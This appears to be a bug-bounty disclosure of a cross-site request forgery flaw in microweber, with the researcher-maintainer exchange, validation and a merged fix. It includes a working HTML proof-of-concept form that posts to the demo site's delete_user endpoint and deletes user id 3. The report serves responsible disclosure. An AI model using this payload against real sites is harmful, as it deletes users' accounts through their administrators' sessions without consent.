Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 30th 2021


✍️ Description

An attacker can delete any user if they know the value of the user id parameter: the delete_user endpoint accepts a state-changing POST from a third-party page with nothing but the victim's session cookie to authorize it.

🕵️‍♂️ Proof of Concept

After opening PoC.html in Firefox or Safari and clicking the submit button (the form can also be auto-submitted), you will see that the user with id 3 has been deleted.

//PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/delete_user" method="POST">
<input type="hidden" name="id" value="3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

A user with id 3 is deleted as soon as the logged-in administrator clicks the submit button on the attacker's page.

📍 Location app.js#L1

We have contacted a member of the microweber team and are waiting to hear back 10 months ago
amammad
10 months ago

Researcher


Hey microweber team, can you give me some feedback? Thanks so much.

Peter Ivanov has invalidated this vulnerability 10 months ago

You need to be logged in as admin to perform this action.

The disclosure bounty has been dropped
The fix bounty has been dropped
amammad
10 months ago

Researcher


Yeah, the main condition of any CSRF attack is that users must be logged in beforehand. Excuse me for my bad explanation, but this is CSRF and a CWE is already assigned to it.

amammad
10 months ago

Researcher


You can set the Strict value on the SameSite attribute of just one of your cookies, and then nobody will be able to perform any CSRF attacks.

Peter Ivanov
10 months ago

Maintainer


Hello, thanks for the info.

Yes, you are correct, some 3rd party domain can trick you.

This makes it a valid issue and we will look at how to fix it.

Will update you soon.

amammad
10 months ago

Researcher


Aaahhh, thank you sir, I was doubting my experience :))

Can you just look at some other reports and validate them too? (They will be hidden until you make a fix for them.)

amammad
10 months ago

Researcher


@admin can you change the status of this report like before?

Jamie Slome
10 months ago

Admin


@amammad @peter - I have updated the status of this report to pending. Feel free to mark as valid if you see fit.

Peter Ivanov validated this vulnerability 10 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 2fa9a6 3 months ago
Peter Ivanov has been awarded the fix bounty